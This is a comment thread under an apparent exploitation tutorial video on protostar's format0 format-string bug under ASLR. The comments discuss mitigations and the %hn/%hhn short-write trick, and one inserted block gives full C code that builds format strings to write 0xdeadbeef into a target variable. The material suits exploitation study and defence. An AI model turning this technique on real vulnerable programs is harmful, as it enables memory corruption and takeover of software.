Playing around with a Format String vulnerability and ASLR. format0 - bin 0x24

  • Published 4 Sep 2024

COMMENTS • 45

  • @cyancoyote7366
    @cyancoyote7366 6 years ago +53

    I love this modern "refresh" series with the programs from protostar being compiled and exploited on modern systems! Thank you for this amazing video once again! :)

    • @marcovalentinoalvarado3290
      @marcovalentinoalvarado3290 3 years ago

      You don't really know how many headaches I got trying to exploit on Windows 10 64-bit with AMD64 assembly lmaooooooo, ASLR, NX and stuff that kicked me in the face xD

    • @selimeneskaraduman6935
      @selimeneskaraduman6935 3 years ago

      @@marcovalentinoalvarado3290 ASLR and NX have friends named Stack Canary, PIE, RelRO. They don't like you either :D

    • @marcovalentinoalvarado3290
      @marcovalentinoalvarado3290 3 years ago

      @@selimeneskaraduman6935 exactly man, I recently discovered RelRO and I was kinda sad :( One more level in the game :( Thanks for your comment! How are you doing on this topic? Are you advancing?

    • @selimeneskaraduman6935
      @selimeneskaraduman6935 3 years ago

      @@marcovalentinoalvarado3290 There is even more stuff like that (e.g. for the Windows kernel: CFG, SMAP), but nowadays even high-end products are still being exploited:
      browsers, virtualization, and kernels.
      The important point is to gain an arbitrary READ/WRITE primitive in memory. If you read some blogs about these exploits you will see the READ/WRITE primitive, because this allows us to bypass mitigations and create target-specific attacks.

    • @marcovalentinoalvarado3290
      @marcovalentinoalvarado3290 3 years ago

      @@selimeneskaraduman6935 Is there any way I can contact you to ask you for some blogs to read? :D

  • @MaxPicAxe
    @MaxPicAxe 5 years ago +9

    6:18 I'm glad you said "if this were an application which took longer to start or a remote service, then you couldn't do it"

  • @antricks2546
    @antricks2546 5 years ago +8

    Hi, just to let you know, there's a trick to write 0xdeadbeef to target. You can write several 2-byte packs of data to finally write 0xdeadbeef. For that you need the original address and the same address with an offset of two at the beginning of your string. If the second 2-byte value is less than the first one you can count to 0x1dead instead of 0xdead (in the case of deadbeef this is not necessary, but if you're in need of doing so...) and overwrite one half byte of the next data word.

    • @jamilhneini1002
      @jamilhneini1002 5 years ago +1

      But that would take an even longer time for the "magical" match to happen, right?

    • @antricks2546
      @antricks2546 5 years ago +1

      It's not the number of output characters that shifts the stack around but the number of input characters. Of course you need to get the padding right to hit the two addresses to write to. But as the second address is a known number of bytes after the first one, you can easily write to the second one as well. It's basically the same as in the video but with two writes and two addresses.

    • @jamilhneini1002
      @jamilhneini1002 5 years ago +1

      @@antricks2546 Ohhhh I see, that's definitely interesting

    • @HackingIsDope
      @HackingIsDope 3 years ago

      Yes, this trick was also explained in the book "Hacking: The Art of Exploitation"

    • @antricks2546
      @antricks2546 3 years ago

      @@HackingIsDope Actually, that's where I got it from ^^

  • @JustCallMeKoko
    @JustCallMeKoko 6 years ago

    I got to the point at 9:40 where my target addr will be 1 nibble off from the address I partially overwrite.
    Example:
    Target addr = 7fff659c8c4c
    Overwritten addr = 7fff659c8d4c
    It is always the digit right before 4c and it is always 1 hex digit greater. It never matches.
    Why would this be?

  • @l42y_
    @l42y_ 6 years ago +7

    Amazing video. But your editing skills have greatly upgraded. Videos feel fuckin smooth. Great job man. And amazing hacking skills you got there. :D

  • @TheAmzuk
    @TheAmzuk 4 years ago

    Thanks for the tutorial. Somehow the modern iteration (x64, libc-2.29) compiles with $rax, which lies after the string, and the technique explained at the very beginning works

  • @FalcoGer
    @FalcoGer 4 years ago +1

    I don't think ASLR is the problem here. I mean I'm a noob, but if you want to write 0xdeadbeef by using %n you would have to have written 3735928559 characters (3.7 GB!!) into the buffer. The stack segment on my machine is 0x21000 bytes long (~135 kB). You'd run into a segfault before you even got to 1 MB written to the buffer.

    • @LiveOverflow
      @LiveOverflow  4 years ago +2

      you can also use multiple %n that overlap each other (I have done that in some video too). You could also write only one or two bytes with %hn etc.

  • @Alex-ffeeb2
    @Alex-ffeeb2 6 years ago +6

    Did you hear about how all Windows versions from 8 till now haven't been applying ASLR properly?

    • @LiveOverflow
      @LiveOverflow  6 years ago +1

      what do you mean?

    • @Alex-ffeeb2
      @Alex-ffeeb2 6 years ago +1

      Apparently they fail to generate enough entropy and end up with the same base addresses each time. There was an article on bleepingcomputer about it

    • @xandercage740
      @xandercage740 6 years ago

      Alexander Anderson, could you share the link to that article here?

    • @Alex-ffeeb2
      @Alex-ffeeb2 6 years ago +2

      Sure www.bleepingcomputer.com/news/security/windows-8-and-later-fail-to-properly-apply-aslr-heres-how-to-fix/

    • @kenji8763
      @kenji8763 6 years ago

      I couldn't believe it, so I found another source, and yep, it's true.
      www.kb.cert.org/vuls/id/817544

  • @odpadkowy
    @odpadkowy 3 years ago

    Why could you "eventually" get the correct address? I would guess that the value on the stack is the address of some other variable; each execution it would be different, but the offset would be the same. So it would shift back and forth as the target does... Why are we able to hit it just by updating the last nibble and not other bytes?

  • @jerryfei5389
    @jerryfei5389 5 years ago +1

    try overriding &target with 0xde and &target+1 with 0xad and so on... so that you don't have to print billions of chars before %n
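A worked version of the short writes that @antricks2546 (two %hn halves, counting on past 0x10000 when the second half is smaller than the first), @LiveOverflow (%hn instead of billions of characters) and @jerryfei5389 (one byte at a time) describe above, added here as an example; it is not code from the video or from protostar. The names target, build_format, write_with_hn and write_with_hhn are assumptions. To keep it deterministic the target pointers are passed to snprintf as explicit arguments; in the real format0 exploit they sit at the start of the input buffer and are reached with %N$hn, which is the part that still depends on the stack offset. Little-endian layout (x86/x86-64) is assumed, and the output goes to a heap buffer instead of the terminal.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The variable the exploit wants to set, like protostar format0's target
   (the name is an assumption; the rest of format0 is not reproduced). */
static uint32_t target;

/* Length of the last forged output, to compare against the 3.7 GB a single
   %n would need for 0xdeadbeef. */
static size_t last_output_len;

/* Build a format string that writes vals[0..n-1] through n consecutive %hn
   (bits == 16) or %hhn (bits == 8) conversions.  Before each write a "%<pad>x"
   conversion (consuming one dummy int argument) pads the output so that the
   running character count equals the next value modulo 2^bits at the moment
   the %hn/%hhn fires.  When the next value is below the current count the
   pad wraps around: this is the "count to 0x1dead instead of 0xdead" trick. */
static void build_format(char *fmt, size_t fmtsz, const uint32_t *vals, int n, int bits)
{
    uint32_t mod = 1u << bits;
    uint32_t count = 0;              /* characters emitted so far */
    size_t len = 0;

    fmt[0] = '\0';
    for (int i = 0; i < n; i++) {
        uint32_t pad = (vals[i] - count) & (mod - 1);
        if (pad == 0)
            pad = mod;               /* %x emits at least one character */
        count += pad;
        len += (size_t)snprintf(fmt + len, fmtsz - len, "%%%ux%s",
                                (unsigned)pad, bits == 16 ? "%hn" : "%hhn");
    }
}

enum { SINK_SIZE = 1 << 18 };        /* room for 2 * 65536 characters */

/* Write value into target with two %hn (low half first; little-endian layout
   assumed).  In a real exploit the two pointers are in the attacker's input
   and are selected with %N$hn; here they are passed as explicit arguments so
   the example does not depend on the stack layout. */
static uint32_t write_with_hn(uint32_t value)
{
    uint16_t *half = (uint16_t *)&target;
    uint32_t vals[2] = { value & 0xffff, value >> 16 };
    char fmt[96];
    char *sink = malloc(SINK_SIZE);

    if (sink == NULL)
        return 0;
    target = 0;
    build_format(fmt, sizeof fmt, vals, 2, 16);
    last_output_len = (size_t)snprintf(sink, SINK_SIZE, fmt, 0, &half[0], 0, &half[1]);
    free(sink);
    return target;
}

/* Same idea with four %hhn, one byte each: at most 4 * 256 output characters. */
static uint32_t write_with_hhn(uint32_t value)
{
    uint8_t *byte = (uint8_t *)&target;
    uint32_t vals[4] = { value & 0xff, (value >> 8) & 0xff,
                         (value >> 16) & 0xff, value >> 24 };
    char fmt[96];
    char *sink = malloc(SINK_SIZE);

    if (sink == NULL)
        return 0;
    target = 0;
    build_format(fmt, sizeof fmt, vals, 4, 8);
    last_output_len = (size_t)snprintf(sink, SINK_SIZE, fmt,
                                       0, &byte[0], 0, &byte[1], 0, &byte[2], 0, &byte[3]);
    free(sink);
    return target;
}

int main(void)
{
    uint32_t got = write_with_hn(0xdeadbeefu);
    printf("%%hn : target = 0x%08x after %zu output chars\n", got, last_output_len);
    got = write_with_hhn(0xdeadbeefu);
    printf("%%hhn: target = 0x%08x after %zu output chars\n", got, last_output_len);
    return 0;
}
```

For 0xdeadbeef the two-%hn payload is "%48879x%hn%8126x%hn" and emits 0xdead = 56,973 characters in total; the four-%hhn payload emits 734. Both stay far below the 3.7 GB that a single %n needs, which is the point of the thread above; the price is one extra pointer in the input buffer per extra write, and each of those pointers still has to be at the right stack offset.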

  • @matony8229
    @matony8229 5 years ago +1

    sprintf will add a null byte at the end of the string..

  • @rishibhatt9595
    @rishibhatt9595 6 years ago +1

    Thanks for the amazing video, I was also trying to do this with ASLR.. But still not able to exploit it.

  • @user-ts2ig9db6d
    @user-ts2ig9db6d 5 years ago

    Amazing video!

  • @lightarmanov6266
    @lightarmanov6266 6 years ago

    I think you could also use BROP to stack-read if your program didn't rerandomize

  • @peterforthewin
    @peterforthewin 6 years ago

    Good video as always

  • @cinest5170
    @cinest5170 6 years ago

    I wonder if shifting bits to the left or right would do anything

  • @lightarmanov6266
    @lightarmanov6266 6 years ago

    I think you could also use the format string to leak the address of target

    • @gameglitcher
      @gameglitcher 5 years ago

      How would you utilize the leaked value in an input string? Can you maintain an open input stream to the program while executing it? Can you by chance hook it to something with an input stream and have it get stored on the stack?

  • @GamingClubGermany
    @GamingClubGermany 6 years ago +3

    255 likes :) coincidence? I don't think so :D

  • @GRBtutorials
    @GRBtutorials 6 years ago

    Why do you rent a server which costs you money instead of using something like Vagrant? You could even use an Orange/Raspberry Pi if you wanted.

    • @LiveOverflow
      @LiveOverflow  6 years ago

      +GRBTutorials laziness. Starting a VM takes longer than renting one for a minute :P

    • @GRBtutorials
      @GRBtutorials 6 years ago

      Sorry for my delayed response (UA-cam didn't notify me). Vagrant actually starts pretty fast, in about 1 minute, at least in my Late 2015 iMac with an i5.

  • @stpauli20537
    @stpauli20537 6 years ago +1

    Hey, I just found an interesting video about an ASLR bypass; in that technique they get around ASLR by looking for a delay in the CPU cache and thereby find the MMU's page map.. it's described better and in more detail in the video, I hope it helps.
    ua-cam.com/video/c8aRHLhQGBc/v-deo.html

  • @mohitvaishnav7283
    @mohitvaishnav7283 6 years ago +1

    please make a video on how to hack a car remote please

  • @HXMCPP
    @HXMCPP 5 years ago

    I didn't understand shit. ASLR is crap in CTFs/challenges